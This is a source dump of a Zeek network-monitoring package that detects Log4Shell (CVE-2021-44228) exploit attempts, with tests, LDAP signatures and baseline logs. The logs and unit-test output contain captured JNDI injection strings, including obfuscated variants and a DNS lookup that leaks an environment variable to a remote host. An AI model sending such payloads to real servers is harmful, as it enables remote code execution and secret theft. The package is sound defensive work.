├── testing ├── .gitignore ├── Makefile ├── Traces │ ├── Readme │ ├── log4j-attack.pcap │ ├── log4j-webapp.pcap │ ├── log4j-dns_exfil.pcap │ ├── log4j-user_agent.pcap │ ├── spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap │ └── 2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap ├── log4j │ ├── unit │ ├── ldap_java.zeek │ ├── log4j-attack │ ├── log4j-webapp │ ├── log4j-dns_exfil │ ├── log4j-user_agent │ ├── notice │ ├── 2021-12-11-thru-13-server-activity-with-log4j-attempts │ ├── log4j-log │ ├── ignore-orig │ ├── ignore-resp │ └── ignore-target ├── Files │ └── random.seed ├── Scripts │ ├── README │ ├── diff-remove-timestamps │ └── get-zeek-env ├── btest.cfg └── Baseline │ ├── log4j.log4j-log │ ├── log4j.log │ └── log4shell.log │ ├── log4j.notice │ ├── http.log │ └── notice.log │ ├── log4j.ldap_java │ ├── signatures.log │ └── notice.log │ ├── log4j.log4j-dns_exfil │ └── notice.log │ ├── log4j.log4j-attack │ └── notice.log │ ├── log4j.unit │ └── output │ ├── log4j.log4j-webapp │ └── notice.log │ ├── log4j.log4j-user_agent │ └── notice.log │ └── log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts │ └── notice.log ├── scripts ├── __load__.zeek ├── ldap_java.sig ├── CVE_2021_44228_java_GET.zeek ├── tests.zeek └── CVE_2021_44228.zeek ├── zkg.meta ├── LICENSE └── README.md /testing/.gitignore: -------------------------------------------------------------------------------- 1 | .btest.failed.dat 2 | .tmp 3 | -------------------------------------------------------------------------------- /testing/Makefile: -------------------------------------------------------------------------------- 1 | 2 | test: 3 | @btest -c btest.cfg 4 | -------------------------------------------------------------------------------- /testing/Traces/Readme: -------------------------------------------------------------------------------- 1 | Source of log4j-webapp.pcap PCAP: https://github.com/cyberxml/log4j-poc/tree/main/data -------------------------------------------------------------------------------- /scripts/__load__.zeek: -------------------------------------------------------------------------------- 1 | @load ./CVE_2021_44228.zeek 2 | @load ./CVE_2021_44228_java_GET.zeek 3 | @load ./tests.zeek 4 | -------------------------------------------------------------------------------- /testing/Traces/log4j-attack.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-attack.pcap -------------------------------------------------------------------------------- /testing/Traces/log4j-webapp.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-webapp.pcap -------------------------------------------------------------------------------- /testing/Traces/log4j-dns_exfil.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-dns_exfil.pcap -------------------------------------------------------------------------------- /testing/Traces/log4j-user_agent.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/log4j-user_agent.pcap -------------------------------------------------------------------------------- /testing/log4j/unit: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure unit tests pass 2 | # @TEST-EXEC: zeek $PACKAGE -e 'redef CVE_2021_44228::run_tests = T;' %INPUT > output 3 | # @TEST-EXEC: btest-diff output 4 | -------------------------------------------------------------------------------- /testing/Traces/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap -------------------------------------------------------------------------------- /testing/Traces/2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/corelight/cve-2021-44228/HEAD/testing/Traces/2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap -------------------------------------------------------------------------------- /testing/log4j/ldap_java.zeek: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-webapp.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-attack: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-attack.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-webapp: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-webapp.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-dns_exfil: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-dns_exfil.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/log4j-user_agent: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-user_agent.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/log4j/notice: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | # @TEST-EXEC: btest-diff http.log 5 | -------------------------------------------------------------------------------- /testing/log4j/2021-12-11-thru-13-server-activity-with-log4j-attempts: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure we still generate a notice and update http.log 2 | # @TEST-EXEC: zeek -Cr $TRACES/2021-12-11-thru-13-server-activity-with-log4j-attempts.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff notice.log 4 | -------------------------------------------------------------------------------- /testing/Files/random.seed: -------------------------------------------------------------------------------- 1 | 2983378351 2 | 1299727368 3 | 0 4 | 310447 5 | 0 6 | 1409073626 7 | 3975311262 8 | 34130240 9 | 1450515018 10 | 1466150520 11 | 1342286698 12 | 1193956778 13 | 2188527278 14 | 3361989254 15 | 3912865238 16 | 3596260151 17 | 517973768 18 | 1462428821 19 | 0 20 | 2278350848 21 | 32767 22 | -------------------------------------------------------------------------------- /testing/log4j/log4j-log: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure log4j.log is created 2 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-user_agent.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: btest-diff log4j.log 4 | # @TEST-EXEC: zeek -Cr $TRACES/log4j-user_agent.pcap $PACKAGE %INPUT CVE_2021_44228::log_path=log4shell 5 | # @TEST-EXEC: btest-diff log4shell.log 6 | -------------------------------------------------------------------------------- /testing/Scripts/README: -------------------------------------------------------------------------------- 1 | Place helper scripts, such a btest-diff canonifiers, in this directory. 2 | Note that Zeek versions 4.1 and newer include their btest tooling as part 3 | of the installation. Take a look at the folder reported via 4 | 5 | zeek-config --btest_tools_dir 6 | 7 | for scripts, PRNG seeds, and pcaps you might be able to reuse. 8 | -------------------------------------------------------------------------------- /testing/log4j/ignore-orig: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure no notice is generated when ignoring target hosts 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: ! test -e notice.log 4 | # @TEST-EXEC: ! test -e log4j.log 5 | 6 | redef CVE_2021_44228::ignorable_orig_hosts += { 154.65.28.250 }; 7 | -------------------------------------------------------------------------------- /testing/log4j/ignore-resp: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure no notice is generated when ignoring target hosts 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: ! test -e notice.log 4 | # @TEST-EXEC: ! test -e log4j.log 5 | 6 | redef CVE_2021_44228::ignorable_resp_hosts += { 172.16.4.58 }; 7 | -------------------------------------------------------------------------------- /testing/log4j/ignore-target: -------------------------------------------------------------------------------- 1 | # @TEST-DOC: Ensure no notice is generated when ignoring target hosts 2 | # @TEST-EXEC: zeek -r $TRACES/spcap-CEXKLs3NQWdEM2CoMj-1639421287179170294-1.pcap $PACKAGE %INPUT 3 | # @TEST-EXEC: ! test -e notice.log 4 | # @TEST-EXEC: ! test -e log4j.log 5 | 6 | redef CVE_2021_44228::ignorable_target_hosts += { "45.83.193.150" }; 7 | -------------------------------------------------------------------------------- /zkg.meta: -------------------------------------------------------------------------------- 1 | [package] 2 | description = A Zeek package which raises notices for RCE in Log4J (CVE-2021-44228). 3 | summary = A Zeek package which raises notices for RCE in Log4J (CVE-2021-44228). 4 | tags = HTTP, Apache, CVE, CVE-2021-44228, encoding, rapidresponse, Java, logging 5 | version = 0.1 6 | script_dir = scripts 7 | # test_command = cd testing && btest -c btest.cfg 8 | -------------------------------------------------------------------------------- /testing/Scripts/diff-remove-timestamps: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env bash 2 | # 3 | # Replace anything which looks like timestamps with XXXs (including the #start/end markers in logs). 4 | 5 | # Get us "modern" regexps with sed. 6 | if [ `uname` == "Linux" ]; then 7 | sed="sed -r" 8 | else 9 | sed="sed -E" 10 | fi 11 | 12 | $sed 's/(0\.000000)|([0-9]{9,10}\.[0-9]{2,8})/XXXXXXXXXX.XXXXXX/g' | \ 13 | $sed 's/^ *#(open|close).(19|20)..-..-..-..-..-..$/#\1 XXXX-XX-XX-XX-XX-XX/g' 14 | -------------------------------------------------------------------------------- /scripts/ldap_java.sig: -------------------------------------------------------------------------------- 1 | signature ldap_client_udp { 2 | ip-proto == udp 3 | payload /^\x30.\x02\x01.\x60/ 4 | } 5 | 6 | signature log4j_javaclassname_udp { 7 | ip-proto == udp 8 | payload /^\x30.*javaClassName/ 9 | requires-reverse-signature ldap_client_udp 10 | event "log4j_javaclassname_udp" 11 | } 12 | 13 | signature ldap_client_tcp { 14 | ip-proto == tcp 15 | payload /^\x30.\x02\x01.\x60/ 16 | } 17 | 18 | signature log4j_javaclassname_tcp { 19 | ip-proto == tcp 20 | payload /^\x30.*javaClassName/ 21 | requires-reverse-signature ldap_client_tcp 22 | event "log4j_javaclassname_tcp" 23 | } 24 | -------------------------------------------------------------------------------- /testing/btest.cfg: -------------------------------------------------------------------------------- 1 | [btest] 2 | TestDirs = log4j 3 | TmpDir = %(testbase)s/.tmp 4 | BaselineDir = %(testbase)s/Baseline 5 | IgnoreDirs = .tmp 6 | IgnoreFiles = *.tmp *.swp #* *.trace .DS_Store 7 | 8 | [environment] 9 | ZEEKPATH=`%(testbase)s/Scripts/get-zeek-env zeekpath` 10 | ZEEK_PLUGIN_PATH=`%(testbase)s/Scripts/get-zeek-env zeek_plugin_path` 11 | ZEEK_SEED_FILE=%(testbase)s/Files/random.seed 12 | PATH=`%(testbase)s/Scripts/get-zeek-env path` 13 | PACKAGE=%(testbase)s/../scripts 14 | TZ=UTC 15 | LC_ALL=C 16 | TRACES=%(testbase)s/Traces 17 | TMPDIR=%(testbase)s/.tmp 18 | TEST_DIFF_CANONIFIER=%(testbase)s/Scripts/diff-remove-timestamps 19 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-log/log4j.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path log4j 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value 9 | #types time string string string string string string string bool string string bool bool 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 /log4shell/ 172.16.238.11:1389/a 172.16.238.11:1389 172.16.238.11 1389 GET T USER-AGENT ${jndi:ldap://172.16.238.11:1389/a} F T 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-log/log4shell.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path log4shell 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid http_uri uri stem target_host target_port method is_orig name value matched_name matched_value 9 | #types time string string string string string string string bool string string bool bool 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 /log4shell/ 172.16.238.11:1389/a 172.16.238.11:1389 172.16.238.11 1389 GET T USER-AGENT ${jndi:ldap://172.16.238.11:1389/a} F T 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.notice/http.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path http 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p trans_depth method host uri referrer version user_agent origin request_body_len response_body_len status_code status_msg info_code info_msg tags username password proxied orig_fuids orig_filenames orig_mime_types resp_fuids resp_filenames resp_mime_types 9 | #types time string addr port addr port count string string string string string string string count count count string count string set[enum] string string set[string] vector[string] vector[string] vector[string] vector[string] vector[string] vector[string] 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 154.65.28.250 57932 172.16.4.58 80 1 GET 24.14.233.177 / - 1.1 curl/7.58.0 - 0 550 200 OK - - CVE_2021_44228::LOG4J_RCE - - - - - - FeXonJ2Qx5uVpCiE2d - text/html 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.ldap_java/signatures.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path signatures 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid src_addr src_port dst_addr dst_port note sig_id event_msg sub_msg sig_count host_count 9 | #types time string addr port addr port enum string string string count count 10 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.11 1389 172.16.238.10 57650 Signatures::Sensitive_Signature log4j_javaclassname_tcp 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... - - 11 | XXXXXXXXXX.XXXXXX CUM0KZ3MLUfNB0cl11 172.16.238.11 1389 172.16.238.10 57742 Signatures::Sensitive_Signature log4j_javaclassname_tcp 172.16.238.11: log4j_javaclassname_tcp 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07... - - 12 | #close XXXX-XX-XX-XX-XX-XX 13 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.notice/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 154.65.28.250 57932 172.16.4.58 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 154.65.28.250 172.16.4.58 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-dns_exfil/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CHhAvVGS1DHFjwGM9 10.10.10.31 36580 172.16.238.10 8080 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/log4shell/', payload_uri=10.10.10.31/POC_PASSWORD, payload_stem=10.10.10.31, payload_host=10.10.10.31, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://10.10.10.31/${env:POC_PASSWORD}}' 10.10.10.31 172.16.238.10 8080 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | #close XXXX-XX-XX-XX-XX-XX 12 | -------------------------------------------------------------------------------- /testing/Scripts/get-zeek-env: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | # 3 | # BTest helper for getting values for Zeek-related environment variables. 4 | 5 | base=$(dirname $0) 6 | zeek_dist=$(cat ${base}/../../build/CMakeCache.txt 2>/dev/null | grep ZEEK_DIST | cut -d = -f 2) 7 | 8 | if [ -n "${zeek_dist}" ]; then 9 | if [ "$1" = "zeekpath" ]; then 10 | ${zeek_dist}/build/zeek-path-dev 11 | elif [ "$1" = "zeek_plugin_path" ]; then 12 | ( cd ${base}/../.. && pwd ) 13 | elif [ "$1" = "path" ]; then 14 | echo ${zeek_dist}/build/src:${zeek_dist}/aux/btest:${base}/:${zeek_dist}/aux/zeek-cut:$PATH 15 | else 16 | echo "usage: $(basename $0) " >&2 17 | exit 1 18 | fi 19 | else 20 | # Use Zeek installation for testing. In this case zeek-config must be in PATH. 21 | if ! which zeek-config >/dev/null 2>&1; then 22 | echo "zeek-config not found" >&2 23 | exit 1 24 | fi 25 | 26 | if [ "$1" = "zeekpath" ]; then 27 | zeek-config --zeekpath 28 | elif [ "$1" = "zeek_plugin_path" ]; then 29 | # Combine the local tree and the system-wide path. This allows 30 | # us to test on a local build or an installation made via zkg, 31 | # which squirrels away the build. --cpk 32 | echo "$(cd ${base}/../.. && pwd):$(zeek-config --plugin_dir)" 33 | elif [ "$1" = "path" ]; then 34 | echo ${PATH} 35 | else 36 | echo "usage: $(basename $0) " >&2 37 | exit 1 38 | fi 39 | fi 40 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2021, Corelight, Inc. All rights reserved. 2 | 3 | Redistribution and use in source and binary forms, with or without 4 | modification, are permitted provided that the following conditions are 5 | met: 6 | 7 | (1) Redistributions of source code must retain the above copyright 8 | notice, this list of conditions and the following disclaimer. 9 | 10 | (2) Redistributions in binary form must reproduce the above copyright 11 | notice, this list of conditions and the following disclaimer in 12 | the documentation and/or other materials provided with the 13 | distribution. 14 | 15 | (3) Neither the name of Corelight nor the names of any contributors 16 | may be used to endorse or promote products derived from this 17 | software without specific prior written permission. 18 | 19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 20 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 21 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 22 | A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT 23 | OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 24 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 25 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 26 | DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 27 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 28 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-attack/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX CUM0KZ3MLUfNB0cl11 198.51.100.10 39010 203.0.113.217 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x92\x02\x01\x02d\x81\x8c\x04\x01a0\x81\x860\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://203.0.113.217:8000/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 198.51.100.10 203.0.113.217 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 198.51.100.10 56958 203.0.113.217 8000 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_102', CONTENT-TYPE='application/java-vm', host='203.0.113.217' 198.51.100.10 203.0.113.217 8000 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | #close XXXX-XX-XX-XX-XX-XX 13 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.unit/output: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | T 3 | T 4 | T 5 | T 6 | T 7 | T 8 | T 9 | T 10 | T 11 | T 12 | T 13 | [T] 14 | [T, T] 15 | [T, T, T] 16 | T 17 | T 18 | T 19 | T 20 | T 21 | T 22 | T 23 | T 24 | [T, T, T] 25 | [] 26 | ${${vgld:jfhv:zyh:c:tvrit:-j}${odm:t:stfd:vaxokx:qanuv:-n}${ufsgjh:tpr:wqlb:-d}${ohq:yyw:ovptvo:ftzg:bemff:-i}:ldap://6pe015373099ca36cc511d.y.psc3evgl.cou} 27 | T 28 | T 29 | T 30 | ${jndi:corbal://0.17.149.63:30123/xvalystgst} 31 | T 32 | T 33 | T 34 | ${jndi:dns://9-99-149-125.example.net/va} 35 | T 36 | T 37 | T 38 | ${jndi:http://0.8.149.07:30871/xvalystgst} 39 | T 40 | T 41 | T 42 | ${jndi:iiop://0.96.149.90:08425/xvalystgst} 43 | T 44 | T 45 | T 46 | ${jndi:ldap://.gf8.rv/mmm} 47 | T 48 | T 49 | T 50 | ${jndi:ldap://dvuuy_hostnaug./a} 51 | T 52 | T 53 | T 54 | ${jndi:ldap://dq0lghbly9rlwhbyb6wlc9nkci0qwmbwaqnklunkbto3ua==.c7pj88ppehix8f1px58fcf9qpogydb7aq.intgractsh.cou/gmploit.class} 55 | T 56 | T 57 | T 58 | ${jndi:ldap://jaka_kariablg_os.qqq.labs.example.cou.1vqeklo8fz70rko0a0nws653xkqlza.borp.ml/a} 59 | T 60 | T 61 | T 62 | ${jndi:ldap://pqn.ae:1954/toucatbypass/dnslof/foo.bar.baz.borz.bizzie.wiz.biz.kk} 63 | T 64 | T 65 | T 66 | ${jndi:loqgrn${loqgr:s}://gnk_kariablg_hostnaug.c7t754bzoc4zj8p51ep8cf2553ayycvb1.example.co} 67 | T 68 | T 69 | T 70 | ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${loqgr:n}${loqgr:d}i:l${loqgr:d}${loqgr:a}p://30.137.173.178:1954/t} ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t j}ngnk_kariablg_gnk_naug:-di${gnk:gnk_naug:-:}${gnk:gnk_naug:-l}d${gnk:gnk_naug:-a}p${gnk:gnk_naug:-:}//30.137.173.178:5851/q ${loqgr${vppgr:n}${loqgr:d}${vppgr:i}:${loqgr:l}${vppgr:d}${loqgr:a}${vppgr:p}://30.137.173.178:1954/t} j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://30.137.173.178:1954/t 71 | T 72 | T 73 | T 74 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.ldap_java/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX ClEkJM2Vm5giqnMf4h 172.16.238.10 57650 172.16.238.11 1389 - - - tcp CVE_2021_44228::LOG4J_LDAP_JAVA Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload. 0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit 172.16.238.10 172.16.238.11 1389 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX C4J4Th3PJpwUYZZ6gc 172.16.238.10 48444 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX CmES5u32sYpV7JYN 172.16.238.10 48534 172.16.238.11 80 - - - tcp CVE_2021_44228::LOG4J_JAVA_CLASS_DOWNLOAD Possible Log4j CVE-2021-44228 exploit, Java has downloaded a Java class over HTTP indicating a potential second stage, after the primary LDAP request. Refer to sub field for user_agent and mime-type user_agent='Java/1.8.0_51', CONTENT-TYPE='application/java-vm', host='172.16.238.11' 172.16.238.10 172.16.238.11 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | #close XXXX-XX-XX-XX-XX-XX 14 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.log4j-webapp/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest 